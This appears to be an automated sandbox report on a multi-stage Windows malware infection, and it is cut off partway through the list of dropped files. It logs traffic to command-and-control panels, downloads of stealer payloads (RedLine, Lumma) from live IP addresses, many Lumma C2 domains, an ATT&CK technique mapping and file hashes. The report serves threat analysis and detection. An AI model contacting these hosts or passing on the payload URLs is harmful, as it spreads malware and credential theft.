POST http://147.45.47.155/ku4Nor9/index.php

HTTP Response

200

HTTP Request

POST http://147.45.47.155/ku4Nor9/index.php

HTTP Response

200

HTTP Request

POST http://147.45.47.155/ku4Nor9/index.php

HTTP Response

200

HTTP Request

POST http://147.45.47.155/ku4Nor9/index.php

HTTP Response

200
77.91.77.81:80

http://77.91.77.81/well/random.exe

http

explortu.exe

214.3kB
5.8MB
4197
4194

HTTP Request

GET http://77.91.77.81/cost/sarra.exe

HTTP Response

200

HTTP Request

GET http://77.91.77.81/soka/random.exe

HTTP Response

200

HTTP Request

GET http://77.91.77.81/cost/random.exe

HTTP Response

200

HTTP Request

GET http://77.91.77.81/well/random.exe

HTTP Response

200
142.250.178.14:443

https://www.youtube.com/account

tls, http2

chrome.exe

2.1kB
10.5kB
15
17

HTTP Request

GET https://www.youtube.com/account
77.91.77.81:80

http://77.91.77.81/Kiru9gu/index.php

http

axplong.exe

1.1MB
30.9MB
22200
22174

HTTP Request

POST http://77.91.77.81/Kiru9gu/index.php

HTTP Response

200

HTTP Request

POST http://77.91.77.81/Kiru9gu/index.php

HTTP Response

200

HTTP Request

GET http://77.91.77.81/lend/judit.exe

HTTP Response

200

HTTP Request

POST http://77.91.77.81/Kiru9gu/index.php

HTTP Response

200

HTTP Request

GET http://77.91.77.81/lend/redline123123.exe

HTTP Response

200

HTTP Request

POST http://77.91.77.81/Kiru9gu/index.php

HTTP Response

200

HTTP Request

GET http://77.91.77.81/lend/upd.exe

HTTP Response

200

HTTP Request

POST http://77.91.77.81/Kiru9gu/index.php

HTTP Response

200

HTTP Request

GET http://77.91.77.81/lend/setup222.exe

HTTP Response

200

HTTP Request

POST http://77.91.77.81/Kiru9gu/index.php

HTTP Response

200

HTTP Request

GET http://77.91.77.81/lend/gold.exe

HTTP Response

200

HTTP Request

POST http://77.91.77.81/Kiru9gu/index.php

HTTP Response

200

HTTP Request

GET http://77.91.77.81/lend/lummac2.exe

HTTP Response

200

HTTP Request

POST http://77.91.77.81/Kiru9gu/index.php

HTTP Response

200

HTTP Request

GET http://77.91.77.81/lend/drivermanager.exe

HTTP Response

200

HTTP Request

POST http://77.91.77.81/Kiru9gu/index.php

HTTP Response

200

HTTP Request

POST http://77.91.77.81/Kiru9gu/index.php

HTTP Response

200

HTTP Request

GET http://77.91.77.81/lend/monster.exe

HTTP Response

200

HTTP Request

POST http://77.91.77.81/Kiru9gu/index.php

HTTP Response

200

HTTP Request

POST http://77.91.77.81/Kiru9gu/index.php

HTTP Response

200

HTTP Request

GET http://77.91.77.81/lend/legs.exe

HTTP Response

200

HTTP Request

POST http://77.91.77.81/Kiru9gu/index.php

HTTP Response

200
142.250.187.238:443

https://accounts.youtube.com/accounts/CheckConnection?pmpo=https%3A%2F%2Faccounts.google.com&v=-532901074&timestamp=1718695545480

tls, http2

chrome.exe

2.7kB
24.4kB
23
24

HTTP Request

GET https://accounts.youtube.com/accounts/CheckConnection?pmpo=https%3A%2F%2Faccounts.google.com&v=-532901074&timestamp=1718695545480
172.217.169.46:443

play.google.com

tls, http2

chrome.exe

989 B
7.8kB
9
9
172.217.169.46:443

play.google.com

tls, http2

chrome.exe

989 B
7.8kB
9
9
142.250.187.196:443

www.google.com

tls

chrome.exe

953 B
4.8kB
8
8
142.250.187.206:443

clients2.google.com

tls, http2

chrome.exe

999 B
8.3kB
9
9
172.67.198.131:443

https://boredombusters.online/version2.txt

tls, http

setup222.exe

1.5MB
39.2MB
28141
28092

HTTP Request

GET https://boredombusters.online/setup.exe

HTTP Response

302

HTTP Request

GET https://boredombusters.online/app/138/setup.exe

HTTP Response

200

HTTP Request

GET https://boredombusters.online/version2.txt

HTTP Response

200
185.215.113.67:40960

redline123123.exe

1.2MB
27.6kB
897
433
185.172.128.33:8970

svhoost.exe

704.3kB
19.4kB
559
263
208.95.112.1:80

http://ip-api.com/json

http

stub.exe

354 B
606 B
5
3

HTTP Request

GET http://ip-api.com/json

HTTP Response

200
4.185.27.237:13528

RegAsm.exe

1.2MB
14.9kB
871
152
185.199.108.133:443

raw.githubusercontent.com

tls

stub.exe

1.2kB
5.2kB
10
13
172.67.165.247:443

https://parallelmercywksoffw.shop/api

tls, http

lummac2.exe

1.5kB
5.6kB
13
12

HTTP Request

POST https://parallelmercywksoffw.shop/api

HTTP Response

200

HTTP Request

POST https://parallelmercywksoffw.shop/api

HTTP Response

200
127.0.0.1:56866

stub.exe
104.21.63.189:443

https://liabiliytshareodlkv.shop/api

tls, http

lummac2.exe

1.1kB
4.7kB
11
10

HTTP Request

POST https://liabiliytshareodlkv.shop/api

HTTP Response

200
172.67.160.81:443

https://notoriousdcellkw.shop/api

tls, http

lummac2.exe

1.0kB
5.5kB
9
9

HTTP Request

POST https://notoriousdcellkw.shop/api

HTTP Response

200
104.21.59.152:443

https://conferencefreckewl.shop/api

tls, http

lummac2.exe

1.0kB
4.6kB
9
9

HTTP Request

POST https://conferencefreckewl.shop/api

HTTP Response

200
172.67.197.45:443

https://flourhishdiscovrw.shop/api

tls, http

lummac2.exe

1.0kB
4.6kB
9
9

HTTP Request

POST https://flourhishdiscovrw.shop/api

HTTP Response

200
172.67.128.71:443

https://landdumpycolorwskfw.shop/api

tls, http

lummac2.exe

1.0kB
4.6kB
9
9

HTTP Request

POST https://landdumpycolorwskfw.shop/api

HTTP Response

200
104.21.92.202:443

https://barebrilliancedkoso.shop/api

tls, http

lummac2.exe

1.2kB
5.6kB
10
9

HTTP Request

POST https://barebrilliancedkoso.shop/api

HTTP Response

200
185.172.128.116:80

http://185.172.128.116/NewLatest.exe

http

axplong.exe

15.5kB
438.5kB
333
332

HTTP Request

GET http://185.172.128.116/NewLatest.exe

HTTP Response

200
172.67.177.28:443

https://willingyhollowsk.shop/api

tls, http

MSBuild.exe

1.1kB
6.3kB
10
10

HTTP Request

POST https://willingyhollowsk.shop/api

HTTP Response

200
127.0.0.1:56900

stub.exe
172.67.221.10:443

https://distincttangyflippan.shop/api

tls, http

MSBuild.exe

1.1kB
6.3kB
10
10

HTTP Request

POST https://distincttangyflippan.shop/api

HTTP Response

200
172.67.151.223:443

https://macabrecondfucews.shop/api

tls, http

MSBuild.exe

1.1kB
6.7kB
10
10

HTTP Request

POST https://macabrecondfucews.shop/api

HTTP Response

200
104.21.30.167:443

https://greentastellesqwm.shop/api

tls, http

MSBuild.exe

1.1kB
6.7kB
10
10

HTTP Request

POST https://greentastellesqwm.shop/api

HTTP Response

200
104.21.76.185:443

https://stickyyummyskiwffe.shop/api

tls, http

MSBuild.exe

1.1kB
6.3kB
10
10

HTTP Request

POST https://stickyyummyskiwffe.shop/api

HTTP Response

200
172.67.204.23:443

https://sturdyregularrmsnhw.shop/api

tls, http

MSBuild.exe

1.1kB
6.7kB
10
10

HTTP Request

POST https://sturdyregularrmsnhw.shop/api

HTTP Response

200
127.0.0.1:56929

stub.exe
127.0.0.1:56931

stub.exe
172.67.144.236:443

https://lamentablegapingkwaq.shop/api

tls, http

MSBuild.exe

1.1kB
6.7kB
10
10

HTTP Request

POST https://lamentablegapingkwaq.shop/api

HTTP Response

200
185.172.128.116:80

http://185.172.128.116/Mb3GvQs8/index.php

http

Hkbsse.exe

832 B
667 B
8
6

HTTP Request

POST http://185.172.128.116/Mb3GvQs8/index.php

HTTP Response

200

HTTP Request

POST http://185.172.128.116/Mb3GvQs8/index.php

HTTP Response

200
172.67.168.179:443

https://innerverdanytiresw.shop/api

tls, http

MSBuild.exe

1.1kB
6.3kB
10
10

HTTP Request

POST https://innerverdanytiresw.shop/api

HTTP Response

200
172.67.141.50:443

https://standingcomperewhitwo.shop/api

tls, http

MSBuild.exe

1.1kB
6.7kB
10
10

HTTP Request

POST https://standingcomperewhitwo.shop/api

HTTP Response

200
5.42.65.67:48396

One.exe

175 B
92 B
3
2
5.42.65.67:48396

One.exe

227 B
92 B
4
2
91.92.240.234:80

http://o7labs.top/visual/bin.exe

http

axplong.exe

15.0kB
448.0kB
326
325

HTTP Request

GET http://o7labs.top/visual/bin.exe

HTTP Response

200
5.42.65.67:48396

One.exe

175 B
92 B
3
2
5.42.65.67:48396

RegAsm.exe

703.6kB
20.0kB
555
167
5.42.65.67:48396

One.exe

175 B
92 B
3
2
5.42.65.67:48396

One.exe

175 B
92 B
3
2
5.42.65.67:48396

One.exe

175 B
92 B
3
2
5.42.65.67:48396

One.exe

175 B
92 B
3
2
5.42.65.67:48396

One.exe

175 B
92 B
3
2
5.42.65.67:48396

One.exe

175 B
92 B
3
2
5.42.65.67:48396

One.exe

175 B
92 B
3
2
5.42.65.67:48396

One.exe

175 B
92 B
3
2
5.42.65.67:48396

One.exe

175 B
92 B
3
2
5.42.65.67:48396

One.exe

175 B
92 B
3
2
5.42.65.67:48396

One.exe

175 B
92 B
3
2
5.42.65.67:48396

One.exe

175 B
92 B
3
2
5.42.65.67:48396

One.exe

175 B
92 B
3
2
5.42.65.67:48396

One.exe

175 B
92 B
3
2
5.42.65.67:48396

One.exe

175 B
92 B
3
2
5.42.65.67:48396

One.exe

175 B
92 B
3
2

8.8.8.8:53

g.bing.com

dns

56 B
151 B
1
1

DNS Request

g.bing.com

DNS Response

204.79.197.237

13.107.21.237
8.8.8.8:53

131.107.17.2.in-addr.arpa

dns

71 B
135 B
1
1

DNS Request

131.107.17.2.in-addr.arpa
8.8.8.8:53

81.77.91.77.in-addr.arpa

dns

70 B
130 B
1
1

DNS Request

81.77.91.77.in-addr.arpa
8.8.8.8:53

155.47.45.147.in-addr.arpa

dns

72 B
127 B
1
1

DNS Request

155.47.45.147.in-addr.arpa
8.8.8.8:53

www.youtube.com

dns

chrome.exe

61 B
271 B
1
1

DNS Request

www.youtube.com

DNS Response

142.250.178.14

142.250.179.238

216.58.204.78

142.250.187.206

142.250.200.14

142.250.200.46

216.58.213.14

142.250.187.238

142.250.180.14

216.58.201.110

172.217.16.238
8.8.8.8:53

accounts.google.com

dns

chrome.exe

65 B
81 B
1
1

DNS Request

accounts.google.com

DNS Response

142.250.27.84
142.250.27.84:443

accounts.google.com

https

chrome.exe

9.1kB
127.4kB
76
129
8.8.8.8:53

3.200.250.142.in-addr.arpa

dns

72 B
110 B
1
1

DNS Request

3.200.250.142.in-addr.arpa
8.8.8.8:53

10.200.250.142.in-addr.arpa

dns

73 B
112 B
1
1

DNS Request

10.200.250.142.in-addr.arpa
8.8.8.8:53

14.178.250.142.in-addr.arpa

dns

73 B
112 B
1
1

DNS Request

14.178.250.142.in-addr.arpa
8.8.8.8:53

84.27.250.142.in-addr.arpa

dns

72 B
105 B
1
1

DNS Request

84.27.250.142.in-addr.arpa
8.8.8.8:53

content-autofill.googleapis.com

dns

chrome.exe

77 B
301 B
1
1

DNS Request

content-autofill.googleapis.com

DNS Response

142.250.200.10

142.250.200.42

216.58.204.74

172.217.169.42

216.58.212.234

142.250.180.10

172.217.16.234

142.250.187.202

216.58.212.202

172.217.169.74

142.250.187.234

216.58.201.106

142.250.179.234

142.250.178.10
8.8.8.8:53

accounts.youtube.com

dns

chrome.exe

66 B
110 B
1
1

DNS Request

accounts.youtube.com

DNS Response

142.250.187.238
8.8.8.8:53

195.212.58.216.in-addr.arpa

dns

73 B
171 B
1
1

DNS Request

195.212.58.216.in-addr.arpa
8.8.8.8:53

238.187.250.142.in-addr.arpa

dns

74 B
113 B
1
1

DNS Request

238.187.250.142.in-addr.arpa
8.8.8.8:53

99.201.58.216.in-addr.arpa

dns

72 B
169 B
1
1

DNS Request

99.201.58.216.in-addr.arpa
8.8.8.8:53

play.google.com

dns

chrome.exe

61 B
77 B
1
1

DNS Request

play.google.com

DNS Response

172.217.169.46
172.217.169.46:443

play.google.com

https

chrome.exe

2.2kB
7.7kB
10
10
172.217.169.46:443

play.google.com

https

chrome.exe

4.5kB
7.5kB
9
11
8.8.8.8:53

www.google.com

dns

chrome.exe

60 B
76 B
1
1

DNS Request

www.google.com

DNS Response

142.250.187.196
142.250.187.196:443

www.google.com

https

chrome.exe

3.9kB
9.5kB
10
11
8.8.8.8:53

46.169.217.172.in-addr.arpa

dns

73 B
112 B
1
1

DNS Request

46.169.217.172.in-addr.arpa
8.8.8.8:53

196.187.250.142.in-addr.arpa

dns

74 B
112 B
1
1

DNS Request

196.187.250.142.in-addr.arpa
8.8.8.8:53

clients2.google.com

dns

chrome.exe

65 B
105 B
1
1

DNS Request

clients2.google.com

DNS Response

142.250.187.206
142.250.187.206:443

clients2.google.com

https

chrome.exe

3.8kB
8.2kB
10
11
224.0.0.251:5353

chrome.exe

204 B
3
8.8.8.8:53

206.187.250.142.in-addr.arpa

dns

74 B
113 B
1
1

DNS Request

206.187.250.142.in-addr.arpa
8.8.8.8:53

boredombusters.online

dns

setup222.exe

67 B
99 B
1
1

DNS Request

boredombusters.online

DNS Response

172.67.198.131

104.21.44.95
8.8.8.8:53

131.198.67.172.in-addr.arpa

dns

73 B
135 B
1
1

DNS Request

131.198.67.172.in-addr.arpa
8.8.8.8:53

67.113.215.185.in-addr.arpa

dns

73 B
133 B
1
1

DNS Request

67.113.215.185.in-addr.arpa
8.8.8.8:53

ip-api.com

dns

stub.exe

56 B
72 B
1
1

DNS Request

ip-api.com

DNS Response

208.95.112.1
8.8.8.8:53

33.128.172.185.in-addr.arpa

dns

73 B
73 B
1
1

DNS Request

33.128.172.185.in-addr.arpa
8.8.8.8:53

raw.githubusercontent.com

dns

stub.exe

71 B
135 B
1
1

DNS Request

raw.githubusercontent.com

DNS Response

185.199.108.133

185.199.111.133

185.199.109.133

185.199.110.133
8.8.8.8:53

11.97.55.23.in-addr.arpa

dns

140 B
133 B
2
1

DNS Request

11.97.55.23.in-addr.arpa

DNS Request

11.97.55.23.in-addr.arpa
8.8.8.8:53

1.112.95.208.in-addr.arpa

dns

71 B
95 B
1
1

DNS Request

1.112.95.208.in-addr.arpa
8.8.8.8:53

237.27.185.4.in-addr.arpa

dns

71 B
157 B
1
1

DNS Request

237.27.185.4.in-addr.arpa
8.8.8.8:53

133.108.199.185.in-addr.arpa

dns

74 B
118 B
1
1

DNS Request

133.108.199.185.in-addr.arpa
8.8.8.8:53

parallelmercywksoffw.shop

dns

lummac2.exe

71 B
103 B
1
1

DNS Request

parallelmercywksoffw.shop

DNS Response

172.67.165.247

104.21.16.21
8.8.8.8:53

liabiliytshareodlkv.shop

dns

lummac2.exe

70 B
102 B
1
1

DNS Request

liabiliytshareodlkv.shop

DNS Response

104.21.63.189

172.67.171.178
8.8.8.8:53

247.165.67.172.in-addr.arpa

dns

73 B
135 B
1
1

DNS Request

247.165.67.172.in-addr.arpa
8.8.8.8:53

notoriousdcellkw.shop

dns

lummac2.exe

67 B
99 B
1
1

DNS Request

notoriousdcellkw.shop

DNS Response

172.67.160.81

104.21.74.169
8.8.8.8:53

189.63.21.104.in-addr.arpa

dns

72 B
134 B
1
1

DNS Request

189.63.21.104.in-addr.arpa
8.8.8.8:53

81.160.67.172.in-addr.arpa

dns

72 B
134 B
1
1

DNS Request

81.160.67.172.in-addr.arpa
8.8.8.8:53

conferencefreckewl.shop

dns

lummac2.exe

69 B
101 B
1
1

DNS Request

conferencefreckewl.shop

DNS Response

104.21.59.152

172.67.179.192
8.8.8.8:53

flourhishdiscovrw.shop

dns

lummac2.exe

68 B
100 B
1
1

DNS Request

flourhishdiscovrw.shop

DNS Response

172.67.197.45

104.21.76.157
8.8.8.8:53

landdumpycolorwskfw.shop

dns

lummac2.exe

70 B
102 B
1
1

DNS Request

landdumpycolorwskfw.shop

DNS Response

172.67.128.71

104.21.0.207
8.8.8.8:53

152.59.21.104.in-addr.arpa

dns

72 B
134 B
1
1

DNS Request

152.59.21.104.in-addr.arpa
8.8.8.8:53

ohfantasyproclaiwlo.shop

dns

lummac2.exe

70 B
127 B
1
1

DNS Request

ohfantasyproclaiwlo.shop
8.8.8.8:53

barebrilliancedkoso.shop

dns

lummac2.exe

70 B
102 B
1
1

DNS Request

barebrilliancedkoso.shop

DNS Response

104.21.92.202

172.67.197.178
8.8.8.8:53

45.197.67.172.in-addr.arpa

dns

72 B
134 B
1
1

DNS Request

45.197.67.172.in-addr.arpa
8.8.8.8:53

71.128.67.172.in-addr.arpa

dns

72 B
134 B
1
1

DNS Request

71.128.67.172.in-addr.arpa
8.8.8.8:53

202.92.21.104.in-addr.arpa

dns

72 B
134 B
1
1

DNS Request

202.92.21.104.in-addr.arpa
8.8.8.8:53

willingyhollowsk.shop

dns

MSBuild.exe

67 B
99 B
1
1

DNS Request

willingyhollowsk.shop

DNS Response

172.67.177.28

104.21.91.177
8.8.8.8:53

116.128.172.185.in-addr.arpa

dns

74 B
74 B
1
1

DNS Request

116.128.172.185.in-addr.arpa
8.8.8.8:53

28.177.67.172.in-addr.arpa

dns

72 B
134 B
1
1

DNS Request

28.177.67.172.in-addr.arpa
8.8.8.8:53

183.59.114.20.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

183.59.114.20.in-addr.arpa
8.8.8.8:53

distincttangyflippan.shop

dns

MSBuild.exe

71 B
103 B
1
1

DNS Request

distincttangyflippan.shop

DNS Response

172.67.221.10

104.21.75.100
8.8.8.8:53

macabrecondfucews.shop

dns

MSBuild.exe

68 B
100 B
1
1

DNS Request

macabrecondfucews.shop

DNS Response

172.67.151.223

104.21.1.23
8.8.8.8:53

greentastellesqwm.shop

dns

MSBuild.exe

68 B
100 B
1
1

DNS Request

greentastellesqwm.shop

DNS Response

104.21.30.167

172.67.173.64
8.8.8.8:53

10.221.67.172.in-addr.arpa

dns

72 B
134 B
1
1

DNS Request

10.221.67.172.in-addr.arpa
8.8.8.8:53

223.151.67.172.in-addr.arpa

dns

73 B
135 B
1
1

DNS Request

223.151.67.172.in-addr.arpa
8.8.8.8:53

stickyyummyskiwffe.shop

dns

MSBuild.exe

69 B
101 B
1
1

DNS Request

stickyyummyskiwffe.shop

DNS Response

104.21.76.185

172.67.198.233
8.8.8.8:53

sturdyregularrmsnhw.shop

dns

MSBuild.exe

70 B
102 B
1
1

DNS Request

sturdyregularrmsnhw.shop

DNS Response

172.67.204.23

104.21.52.210
8.8.8.8:53

167.30.21.104.in-addr.arpa

dns

72 B
134 B
1
1

DNS Request

167.30.21.104.in-addr.arpa
8.8.8.8:53

206.23.85.13.in-addr.arpa

dns

71 B
145 B
1
1

DNS Request

206.23.85.13.in-addr.arpa
8.8.8.8:53

185.76.21.104.in-addr.arpa

dns

72 B
134 B
1
1

DNS Request

185.76.21.104.in-addr.arpa
8.8.8.8:53

lamentablegapingkwaq.shop

dns

MSBuild.exe

71 B
103 B
1
1

DNS Request

lamentablegapingkwaq.shop

DNS Response

172.67.144.236

104.21.10.78
8.8.8.8:53

innerverdanytiresw.shop

dns

MSBuild.exe

69 B
101 B
1
1

DNS Request

innerverdanytiresw.shop

DNS Response

172.67.168.179

104.21.79.21
8.8.8.8:53

23.204.67.172.in-addr.arpa

dns

72 B
134 B
1
1

DNS Request

23.204.67.172.in-addr.arpa
8.8.8.8:53

236.144.67.172.in-addr.arpa

dns

73 B
135 B
1
1

DNS Request

236.144.67.172.in-addr.arpa
8.8.8.8:53

standingcomperewhitwo.shop

dns

MSBuild.exe

72 B
104 B
1
1

DNS Request

standingcomperewhitwo.shop

DNS Response

172.67.141.50

104.21.9.31
8.8.8.8:53

179.168.67.172.in-addr.arpa

dns

73 B
135 B
1
1

DNS Request

179.168.67.172.in-addr.arpa
8.8.8.8:53

50.141.67.172.in-addr.arpa

dns

72 B
134 B
1
1

DNS Request

50.141.67.172.in-addr.arpa
8.8.8.8:53

67.65.42.5.in-addr.arpa

dns

69 B
129 B
1
1

DNS Request

67.65.42.5.in-addr.arpa
8.8.8.8:53

o7labs.top

dns

Hkbsse.exe

56 B
72 B
1
1

DNS Request

o7labs.top

DNS Response

91.92.240.234
8.8.8.8:53

234.240.92.91.in-addr.arpa

dns

72 B
132 B
1
1

DNS Request

234.240.92.91.in-addr.arpa
8.8.8.8:53

o7labs.top

dns

Hkbsse.exe

112 B
128 B
2
2

DNS Request

o7labs.top

DNS Request

o7labs.top

DNS Response

91.92.240.234
8.8.8.8:53

23.236.111.52.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

23.236.111.52.in-addr.arpa

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

System Services

T1569

Service Execution

T1569.002

Persistence

Account Manipulation

T1098

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Account Manipulation

T1098

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Virtualization/Sandbox Evasion

T1497

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Process Discovery

T1057

Query Registry

T1012

System Information Discovery

T1082

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\1000015002\7700de6bf0.exe

Filesize
1.8MB

MD5
1596ee7e65daddbde81639b512266192

SHA1
7b4e07d83fff5b94fe6c04273c6043956784e4a4

SHA256
7ec77d0583d16a39eff4b8b3896e819e18eeef8d28ecdf762d54e4e0f2178b90

SHA512
46d4d7aa9b599a764b056aad110c924b5a109aabdfd5eb178356ea5cb848229c96b6dd36d8bc9f16ff25ef5e076f28ff78536844e993a545c7354d9daa0a4392

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
7KB

MD5
f03d1b81d0ac4883fb4a6a795a95ba8b

SHA1
4c12cda86b99a1796c5e7bcd72e85aecd33ff4fe

SHA256
53b5cd8e9ab8fa5c1d5a37404f8e433ed95b78731972ca40cc6b36442978acd9

SHA512
0bce1b9ddc922aac934fb186c987742860114c3f7a49dfdbccec813ca8c1ae1e5fe188bd3858ccb87dfbfcfda32217aa18c9af029dc6e2f8823f33bca814de44

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
277KB

MD5
7ccf9f8976385e75b3e0298e13610700

SHA1
4e6fafdf9fc456da6d2a7837585daf8b824500d0

SHA256
69fef4160e7f7ad2046795aabc0bf57e5e43d352daa28fc1aca90a27f3582c6c

SHA512
b063df8186e5101f32fc4dcfdff857c397c1210766b8f15deecc077324771fbfbb4f7ff48a6d4056063444b2719a487590eef1867d37b40091f4fe08164b2bc3

Download Submit
C:\Users\Admin\AppData\Local\Temp\004059303877

Filesize
63KB

MD5
52620023f140396163cd8c72506adb5c

SHA1
2c70f7e3f17059be8c240d2cec15b094e8269f71

SHA256
3e2d32bcbf66eb83e20f73b33f815b6e6f05df8ac61c12377abe269611e3e71b

SHA512
20f33a70c2955027b6f612f093e9b12d47222dbbd9b136976f532abd195afa9b1a54d9e39068de318870f421363d20665906c2b11fc61930294d25d3d108c77f

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000005001\judit.exe

Filesize
10.7MB

MD5
c09ff1273b09cb1f9c7698ed147bf22e

SHA1
5634aec5671c4fd565694aa12cd3bf11758675d2

SHA256
bf8ce6bb537881386facfe6c1f9003812b985cbc4b9e9addd39e102449868d92

SHA512
e8f19b432dc3be9a6138d6a2f79521599087466d1c55a49d73600c876508ab307a6e65694e0effb5b705fdecdd0e201f588c8d5c3767fe9ae0b8581c318cadac

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000007001\redline123123.exe

Filesize
297KB

MD5
0efd5136528869a8ea1a37c5059d706e

SHA1
3593bec29dbfd333a5a3a4ad2485a94982bbf713

SHA256
7c21c1f3063ba963818542036a50f62ac7494ad422e7088897b55c61306ec74e

SHA512
4ac391812634107e4a4318c454a19e7c34abfc1f97acc9bcd0fac9a92c372e5ebfe809e5c433479142537762ed633564bc690b38fc268b169498d6a54249e3fe

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000008001\upd.exe

Filesize
1.7MB

MD5
e8a7d0c6dedce0d4a403908a29273d43

SHA1
8289c35dabaee32f61c74de6a4e8308dc98eb075

SHA256
672f24842aeb72d7bd8d64e78aaba5f3a953409ce21cfe97d3a80e7ef67f232a

SHA512
c8bf2f42f7bcf6f6b752ba5165c57ee99d4b31d5ba48ce1c2651afdb8bc37a14f392253f3daa0e811116d11d4c9175dc55cfb1baac0c30a71a18e1df17e73770

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000016001\dd6917148a.exe

Filesize
1.3MB

MD5
b044b35c7a7b17bc02da7949ec91d825

SHA1
ca43dbf2bcd6be6c39af686bfce78df95b3310d1

SHA256
064acd680c81e7262f11026720cdf976b1dbc822046e47d4b81540391a4f4a9d

SHA512
d85a12b7e34a83ed4f0924abb44e0510121efc7131b4ea8cbb1893d43a9b155f9103b5030bb358af9bfc73ff142cffa123a488e10f484f44499f652b8605cce6

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000017001\38f0c3dd14.exe

Filesize
1.1MB

MD5
485673cd656c36fb6dcf4a9025803e18

SHA1
c958d537977640eaa73f7ebdb22998c741aee5dc

SHA256
a6e81915b0dddf0bd702548a632e1bea467709b354a17e93358da52e030fcc88

SHA512
a1894f21bcb1a9885b54192c74f8f1dcea93b8585777ad45a3e77263a52895c94e612ad13adc375e52c610fb9735e7b62986f73af8ef11a0feff884f04fb4d45

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000025001\setup222.exe

Filesize
96KB

MD5
8677376c509f0c66d1f02c6b66d7ef90

SHA1
e057eddf9d2e319967e200a5801e4bbe6e45862a

SHA256
f7afac39d2754ac953bf129ee094c8b092e349cdf35f1ba23c2c76a0229f9e96

SHA512
e0c685e289c10a48b5fa251aa4414653c103dac69faf536b9ae9598e066aab5a03b03c09096c42a0f244aeaf80f2b9e4aa28d6b28da436587a3f52a9155473d0

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000035001\gold.exe

Filesize
522KB

MD5
70a578f7f58456e475facd69469cf20a

SHA1
83e147e7ba01fa074b2f046b65978f838f7b1e8e

SHA256
5c8d556e39269b22e63ba9c941ff306bb043bc35125ba08787617577231b381a

SHA512
707ed48b45978d26faaf3544bf22912461503d6e4b1a077cbb7c3a8abd2f1eb3fec16b2786a79ae4db2dfec92f662ece1998bc142706d2b482599fb6191563c0

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000047001\lummac2.exe

Filesize
310KB

MD5
6e3d83935c7a0810f75dfa9badc3f199

SHA1
9f7d7c0ea662bcdca9b0cda928dc339f06ef0730

SHA256
dc4f0a8e3d12c98eac09a42bd976579ccc1851056d9de447495e8be7519760ed

SHA512
9f6b22bc9d0306a69d3c5bab83c7603fa23925c12089f9608772602ab2c4c0908cda2a3d9592fc0fab4aaff209ef41d3e2a931511ce9dfd027691e8dce9ad9b9

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000063001\drivermanager.exe

Filesize
3.6MB

MD5
c28a2d0a008788b49690b333d501e3f3

SHA1
6a25fdb8613db00b09d4d6e1ad302c20c7f7e2c4

SHA256
f61712dccccf8f19c6dbf0dfb7c7c0be9eb2f13d3381ee94e4cb6cb70ffb5f5a

SHA512
455923a63e60b6079d7e0af2bfae5f922b205d024def456ae95158ef1bfcdbc4f56e24b4421a2203f4618d0ea29e229e331c7ee0d7881ee8ebac83fa72f5d788

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000064001\NewLatest.exe

Filesize
415KB

MD5
07101cac5b9477ba636cd8ca7b9932cb

SHA1
59ea7fd9ae6ded8c1b7240a4bf9399b4eb3849f1

SHA256
488385cd54d14790b03fa7c7dc997ebea3f7b2a8499e5927eb437a3791102a77

SHA512
02240ff51a74966bc31cfcc901105096eb871f588efaa9be1a829b4ee6f245bd9dca37be7e2946ba6315feea75c3dce5f490847250e62081445cd25b0f406887

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000070001\monster.exe

Filesize
10.7MB

MD5
3f4f5c57433724a32b7498b6a2c91bf0

SHA1
04757ff666e1afa31679dd6bed4ed3af671332a3

SHA256
0608a7559f895fab33ae65bbfbdc5bebd21eea984f76e1b5571c80906824d665

SHA512
cf572ca616b4f4e6e472e33e8d6d90b85d5885fa64d8bca4507450d66d65057efa771f58c31ea13f394fd0e7b0ff2fcaa9d54c61f28b27b98a79c27bc964f935

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000073001\bin.exe

Filesize
424KB

MD5
13e5872e9b7c47090e035dc228c5589f

SHA1
c55a9708091f19b5fc5baf7c37beb99d8d3bf760

SHA256
d6cfb9d6c862be5a244eb5e4c6339312f74b7eb57cad8d08f56e3de0024b2bbc

SHA512
260671baa8f30e2364b21ab0a9cd3d8a104f76032ebfd3684150d8c318b9cb759b246ae8df25274e864053a6d55bdb77e028452b1d91999b37efc291f8ee815e

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000075001\legs.exe

Filesize
659KB

MD5
bbd06263062b2c536b5caacdd5f81b76

SHA1
